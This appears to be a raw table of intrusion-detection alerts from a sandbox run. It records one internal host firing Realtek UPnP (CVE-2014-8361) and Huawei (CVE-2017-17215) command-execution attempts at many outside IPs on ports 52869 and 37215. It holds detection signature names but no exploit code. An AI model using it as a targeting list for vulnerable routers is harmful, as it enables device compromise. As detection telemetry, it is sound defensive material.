                                      07/20/24-23:01:44.362240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614296852869192.168.2.2348.223.177.47
                                      07/20/24-23:03:46.099099TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614215852869192.168.2.2339.42.185.132
                                      07/20/24-23:01:40.301143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504037215192.168.2.23111.130.70.21
                                      07/20/24-23:01:45.118041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5987452869192.168.2.2393.106.207.118
                                      07/20/24-23:01:44.280821TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25025452869192.168.2.234.66.151.191
                                      07/20/24-23:01:49.232174TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615151052869192.168.2.2386.212.150.4
                                      07/20/24-23:01:34.050672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940837215192.168.2.23197.35.38.63
                                      07/20/24-23:01:25.288927TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5168652869192.168.2.2370.161.8.187
                                      07/20/24-23:01:42.617689TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26085252869192.168.2.2377.135.26.34
                                      07/20/24-23:01:48.216693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6093452869192.168.2.23133.159.36.252
                                      07/20/24-23:01:43.007032TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6064052869192.168.2.238.18.22.34
                                      07/20/24-23:01:00.639011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797037215192.168.2.2341.232.6.48
                                      07/20/24-23:01:04.098909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602237215192.168.2.2341.78.28.79
                                      07/20/24-23:01:21.943544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5117637215192.168.2.2341.49.181.54
                                      07/20/24-23:01:57.757934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4759452869192.168.2.23208.150.189.204
                                      07/20/24-23:01:58.249115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4079452869192.168.2.2334.100.42.211
                                      07/20/24-23:01:02.090403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3669452869192.168.2.23153.0.45.254
                                      07/20/24-23:01:51.358348TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25765452869192.168.2.23195.45.218.64
                                      07/20/24-23:02:37.123706TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4269252869192.168.2.2390.118.44.58
                                      07/20/24-23:01:20.592479TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23659652869192.168.2.2332.75.241.221
                                      07/20/24-23:01:08.634900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5402852869192.168.2.23195.184.165.232
                                      07/20/24-23:00:59.213564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833037215192.168.2.2341.128.110.44
                                      07/20/24-23:01:21.938818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4923637215192.168.2.2341.239.63.70
                                      07/20/24-23:01:41.347676TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614610452869192.168.2.23173.176.211.200
                                      07/20/24-23:02:03.032025TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5885452869192.168.2.2360.191.4.143
                                      07/20/24-23:01:34.044537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019637215192.168.2.23220.35.159.72
                                      07/20/24-23:01:45.092574TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3455252869192.168.2.2334.147.70.115
                                      07/20/24-23:01:02.045685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3383837215192.168.2.2341.101.142.15
                                      07/20/24-23:01:08.652877TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4958452869192.168.2.2393.10.103.253
                                      07/20/24-23:01:08.582150TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26020852869192.168.2.23189.28.183.134
                                      07/20/24-23:01:42.717611TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23863452869192.168.2.23163.215.30.136
                                      07/20/24-23:01:41.676253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5874252869192.168.2.23157.9.32.210
                                      07/20/24-23:01:43.282556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4541852869192.168.2.23173.144.227.253
                                      07/20/24-23:01:04.187171TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5965052869192.168.2.2357.179.102.199
                                      07/20/24-23:01:42.571884TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615006252869192.168.2.23106.219.50.159
                                      07/20/24-23:01:42.800757TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23694652869192.168.2.23222.217.185.57
                                      07/20/24-23:01:47.693711TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5845052869192.168.2.23125.188.157.139
                                      07/20/24-23:01:03.486619TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4386252869192.168.2.23209.154.77.145
                                      07/20/24-23:02:07.698636TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24142252869192.168.2.23166.233.183.8
                                      07/20/24-23:01:27.653586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425837215192.168.2.23175.51.152.50
                                      07/20/24-23:01:51.400635TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25479252869192.168.2.23156.192.144.142
                                      07/20/24-23:01:31.975513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519437215192.168.2.23157.217.25.84
                                      07/20/24-23:02:01.256493TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615251252869192.168.2.23133.248.174.120
                                      07/20/24-23:00:59.211046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4632637215192.168.2.23157.222.120.169
                                      07/20/24-23:01:47.410893TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614721852869192.168.2.2394.51.135.205
                                      07/20/24-23:01:27.650243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890037215192.168.2.23157.154.3.106
                                      07/20/24-23:01:44.698984TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24051252869192.168.2.23154.31.9.47
                                      07/20/24-23:01:20.181938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943237215192.168.2.2341.213.41.33
                                      07/20/24-23:01:42.042815TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615457052869192.168.2.2349.137.23.5
                                      07/20/24-23:01:31.312614TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24944852869192.168.2.23114.247.247.18
                                      07/20/24-23:01:43.938688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4410452869192.168.2.23152.150.124.219
                                      07/20/24-23:01:41.275004TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615577252869192.168.2.23112.189.246.31
                                      07/20/24-23:01:46.490827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5123252869192.168.2.23112.170.166.3
                                      07/20/24-23:01:51.944006TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4339652869192.168.2.23182.158.136.187
                                      07/20/24-23:01:08.607816TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24364452869192.168.2.2378.200.30.164
                                      07/20/24-23:01:40.307219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4725637215192.168.2.23197.19.231.74
                                      07/20/24-23:01:43.944379TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615781252869192.168.2.2365.50.132.254
                                      07/20/24-23:01:51.183470TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5904452869192.168.2.23167.207.100.170
                                      07/20/24-23:01:31.316196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25949052869192.168.2.2359.21.137.98
                                      07/20/24-23:01:31.986571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605037215192.168.2.23209.95.190.72
                                      07/20/24-23:01:41.238000TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615264252869192.168.2.23190.125.30.210
                                      07/20/24-23:01:08.560530TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24968052869192.168.2.23109.23.172.87
                                      07/20/24-23:01:42.651912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3565452869192.168.2.2317.17.223.92
                                      07/20/24-23:01:43.918789TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5708852869192.168.2.23129.76.21.211
                                      07/20/24-23:00:57.220685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3673437215192.168.2.23157.189.55.135
                                      07/20/24-23:01:42.817395TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3539252869192.168.2.23137.218.170.227
                                      07/20/24-23:01:44.446628TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615868252869192.168.2.2332.189.144.58
                                      07/20/24-23:01:53.392805TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25457052869192.168.2.23149.78.178.94
                                      07/20/24-23:01:49.567841TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615318652869192.168.2.23213.235.51.156
                                      07/20/24-23:02:05.636717TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3417452869192.168.2.2399.148.114.78
                                      07/20/24-23:01:31.329969TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25971852869192.168.2.2336.125.123.117
                                      07/20/24-23:01:14.097135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5017837215192.168.2.23105.62.150.147
                                      07/20/24-23:01:56.210612TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25937252869192.168.2.23193.18.125.219
                                      07/20/24-23:01:45.713934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6099852869192.168.2.2397.24.147.38
                                      07/20/24-23:01:26.151841TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5895652869192.168.2.23213.157.19.102
                                      07/20/24-23:01:56.577149TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24437252869192.168.2.2364.151.112.79
                                      07/20/24-23:01:00.634292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3876837215192.168.2.2364.62.112.142
                                      07/20/24-23:01:31.986571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3343637215192.168.2.232.53.137.120
                                      07/20/24-23:01:11.639230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3391037215192.168.2.23131.224.25.117
                                      07/20/24-23:01:43.078618TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4360252869192.168.2.2364.107.44.177
                                      07/20/24-23:01:02.449592TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4337852869192.168.2.23201.173.108.254
                                      07/20/24-23:00:59.153608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453437215192.168.2.23157.86.250.128
                                      07/20/24-23:01:52.546535TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4505652869192.168.2.2338.184.175.46
                                      07/20/24-23:01:44.831437TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5157052869192.168.2.23172.247.8.242
                                      07/20/24-23:00:57.221504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4663237215192.168.2.23197.17.13.46
                                      07/20/24-23:01:08.623583TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23367052869192.168.2.23164.251.43.137
                                      07/20/24-23:01:27.655551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5421037215192.168.2.23197.122.89.119
                                      07/20/24-23:01:45.500697TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615995052869192.168.2.2388.49.181.78
                                      07/20/24-23:02:02.527007TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3987652869192.168.2.23217.255.162.70
                                      07/20/24-23:01:41.354322TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613538052869192.168.2.23125.246.56.225
                                      07/20/24-23:01:42.608153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3739852869192.168.2.23143.66.245.70
                                      07/20/24-23:01:42.912947TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3285252869192.168.2.23131.104.254.70
                                      07/20/24-23:00:59.157444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3703837215192.168.2.23107.136.23.140
                                      07/20/24-23:01:43.498156TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613841252869192.168.2.23220.111.117.206
                                      07/20/24-23:01:46.808111TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24734852869192.168.2.2317.182.173.35
                                      07/20/24-23:01:55.666677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4177452869192.168.2.23125.67.244.75
                                      07/20/24-23:00:59.172943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311837215192.168.2.23197.65.44.128
                                      07/20/24-23:02:06.767377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4295452869192.168.2.2353.5.161.227
                                      07/20/24-23:01:01.139063TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614346652869192.168.2.23189.75.86.189
                                      07/20/24-23:01:41.549051TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615069652869192.168.2.2388.132.0.162
                                      07/20/24-23:01:46.176757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5390252869192.168.2.23202.109.173.165
                                      07/20/24-23:01:43.515688TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613839852869192.168.2.23137.133.156.16
                                      07/20/24-23:02:21.324806TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614621452869192.168.2.2327.91.150.196
                                      07/20/24-23:01:42.499887TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3313052869192.168.2.23220.112.19.15
                                      07/20/24-23:01:08.939279TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24968052869192.168.2.23117.49.51.0
                                      07/20/24-23:01:47.420081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5135452869192.168.2.23114.188.204.238
                                      07/20/24-23:00:59.203960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3790637215192.168.2.2341.53.184.177
                                      07/20/24-23:01:24.877747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913237215192.168.2.23157.65.10.54
                                      07/20/24-23:01:41.345953TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4542252869192.168.2.23219.124.32.18
                                      07/20/24-23:01:02.103737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538437215192.168.2.2341.95.186.20
                                      07/20/24-23:02:04.133788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5881852869192.168.2.2383.234.152.115
                                      07/20/24-23:01:40.291616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5005437215192.168.2.2338.187.179.55
                                      07/20/24-23:01:52.701293TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5339652869192.168.2.23175.210.141.95
                                      07/20/24-23:01:59.030102TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3611652869192.168.2.23159.45.241.196
                                      07/20/24-23:01:42.637859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5731252869192.168.2.2378.5.59.56
                                      07/20/24-23:01:52.543362TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25820852869192.168.2.2383.201.129.18
                                      07/20/24-23:01:07.021159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052637215192.168.2.2341.63.85.196
                                      07/20/24-23:01:57.943877TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615012852869192.168.2.23103.180.88.194
                                      07/20/24-23:01:44.491962TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5465452869192.168.2.23143.254.203.194
                                      07/20/24-23:01:42.147980TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24797252869192.168.2.2375.161.254.133
                                      07/20/24-23:00:59.211046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344437215192.168.2.23197.168.86.78
                                      07/20/24-23:01:41.967549TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24881252869192.168.2.23103.68.36.118
                                      07/20/24-23:01:21.923917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631837215192.168.2.23197.212.226.255
                                      07/20/24-23:01:42.069870TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23370652869192.168.2.2320.143.101.231
                                      07/20/24-23:01:20.161614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570237215192.168.2.23157.73.42.54
                                      07/20/24-23:01:42.891313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3554452869192.168.2.23206.12.145.11
                                      07/20/24-23:01:08.578727TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23808052869192.168.2.2348.69.126.229
                                      07/20/24-23:01:10.633889TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5426452869192.168.2.2357.137.225.59
                                      07/20/24-23:01:08.620788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6070252869192.168.2.23186.129.229.179
                                      07/20/24-23:02:05.287905TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615588052869192.168.2.23221.139.54.252
                                      07/20/24-23:01:24.862410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5572437215192.168.2.2334.93.53.66
                                      07/20/24-23:01:49.525770TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5781252869192.168.2.2374.81.74.58
                                      07/20/24-23:01:05.126622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4254452869192.168.2.23174.56.72.194
                                      07/20/24-23:01:56.300735TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25223652869192.168.2.2349.127.162.127
                                      07/20/24-23:01:20.149798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3365637215192.168.2.2341.31.171.242
                                      07/20/24-23:01:44.765093TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23364452869192.168.2.2339.114.224.236
                                      07/20/24-23:02:00.351070TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4525652869192.168.2.23130.165.149.247
                                      07/20/24-23:01:42.486622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24370452869192.168.2.2347.30.224.199
                                      07/20/24-23:01:02.095698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166637215192.168.2.23157.58.16.237
                                      07/20/24-23:01:24.724267TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614284852869192.168.2.2375.178.59.59
                                      07/20/24-23:00:59.204975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5552837215192.168.2.23210.132.156.163
                                      07/20/24-23:01:03.407760TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5364052869192.168.2.2391.10.179.128
                                      07/20/24-23:01:11.630767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664637215192.168.2.2381.64.188.238
                                      07/20/24-23:01:20.169339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3763437215192.168.2.2341.215.162.139
                                      07/20/24-23:01:13.983744TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614005852869192.168.2.23207.246.209.117
                                      07/20/24-23:02:11.380126TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4788852869192.168.2.23130.112.45.111
                                      07/20/24-23:02:09.668312TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5690852869192.168.2.23146.174.220.5
                                      07/20/24-23:01:45.648154TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615432652869192.168.2.23149.78.178.94
                                      07/20/24-23:01:08.691384TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3721252869192.168.2.23155.161.137.123
                                      07/20/24-23:02:08.128674TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4679052869192.168.2.23107.35.253.244
                                      07/20/24-23:01:31.975158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771637215192.168.2.23197.229.171.249
                                      07/20/24-23:01:44.449742TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4392452869192.168.2.23213.118.6.220
                                      07/20/24-23:01:41.967549TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24498452869192.168.2.23154.201.154.131
                                      07/20/24-23:01:04.058922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3855837215192.168.2.2341.21.126.116
                                      07/20/24-23:01:27.668073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5655037215192.168.2.2398.247.239.87
                                      07/20/24-23:01:52.343511TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615295052869192.168.2.23184.89.50.234
                                      07/20/24-23:01:53.356560TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5159252869192.168.2.23189.124.57.3
                                      07/20/24-23:00:59.158278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3905437215192.168.2.2341.184.89.253
                                      07/20/24-23:01:03.225977TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614306052869192.168.2.23223.83.213.222
                                      07/20/24-23:01:52.425638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5923252869192.168.2.23133.73.57.190
                                      07/20/24-23:01:01.861410TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5522452869192.168.2.23162.63.105.168
                                      07/20/24-23:01:42.623848TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25757852869192.168.2.2396.213.123.243
                                      07/20/24-23:01:41.263057TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615998452869192.168.2.23137.127.2.156
                                      07/20/24-23:01:56.400580TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25114052869192.168.2.23116.148.59.65
                                      07/20/24-23:01:07.114267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582237215192.168.2.23107.192.16.201
                                      07/20/24-23:01:57.169212TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4466252869192.168.2.23155.107.33.68
                                      07/20/24-23:01:34.050313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357637215192.168.2.23206.22.143.145
                                      07/20/24-23:01:41.482016TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616016052869192.168.2.23167.210.235.204
                                      07/20/24-23:01:03.215254TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4280452869192.168.2.23177.27.5.34
                                      07/20/24-23:01:42.837135TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3485452869192.168.2.2348.145.35.196
                                      07/20/24-23:01:03.126921TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615272252869192.168.2.23139.37.94.236
                                      07/20/24-23:01:41.417573TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4812452869192.168.2.232.228.92.40
                                      07/20/24-23:01:44.484644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5146452869192.168.2.2399.207.71.238
                                      07/20/24-23:00:59.211046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281237215192.168.2.2341.248.83.42
                                      07/20/24-23:01:21.951975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957437215192.168.2.23197.169.42.163
                                      07/20/24-23:01:12.852602TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23731452869192.168.2.23104.80.144.32
                                      07/20/24-23:01:49.750742TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24283252869192.168.2.2367.179.229.220
                                      07/20/24-23:01:31.991336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373437215192.168.2.2341.126.24.60
